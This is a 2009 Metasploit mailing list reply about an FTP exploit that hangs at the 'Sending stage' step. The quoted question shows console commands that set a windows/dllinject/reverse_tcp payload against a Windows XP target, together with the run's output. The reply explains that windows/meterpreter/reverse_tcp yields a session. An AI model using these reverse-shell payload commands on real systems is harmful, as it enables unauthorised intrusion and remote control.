Metasploit mailing list archives

Re: Exploit failed: a target has not been selected


From: Stephen Fewer <stephen_fewer () harmonysecurity com>
Date: Tue, 03 Nov 2009 13:55:51 +0000

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


But when I tried another payload to inject DLL file:

set PAYLOAD windows/dllinject/reverse_tcp
set DLL data/meterpreter/metsrv.dll
set target 3
exploit
Butn then metasploit seems to hang at the "sending stage" step:

[*] Connecting to FTP server 10.0.0.10:21...
[*] Started reverse handler
[*] Connected to target FTP server.
[*] Trying target Windows XP SP3 English...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (719360 bytes)


I waited for a while, but nothing happend.

Is it a bug that needs a fix, too?

Anybody knows how to fix the problem with this DLL injection payload
(windows/dllinject/reverse_tcp)?


I'm guessing the problem is you should use:

set PAYLOAD windows/meterpreter/reverse_tcp

instead of 'windows/dllinject/reverse_tcp' if you want a meterpreter
payload, because after the dll has been injected the payload, on the MSF
side, needs to then establish a session.

The 'windows/meterpreter/*' payloads will establish a meterpreter
session but the 'windows/dllinject/*' payloads will not establish any
session as they only inject an arbitrary dll and do not know what type
of session (if any) should be established, which is expected behaviour.

- - Stephen.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAkrwNmcACgkQQIrmi1YdFr5tigCeO4lSXwlog6C4q354gUpFEGL/
Ae4An0UXdXqxZXWLsDC2vY3sRTQG9eQR
=1CVx
-----END PGP SIGNATURE-----


__________ Information from ESET NOD32 Antivirus, version of virus signature database 4568 (20091103) __________

The message was checked by ESET NOD32 Antivirus.

http://www.eset.com


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: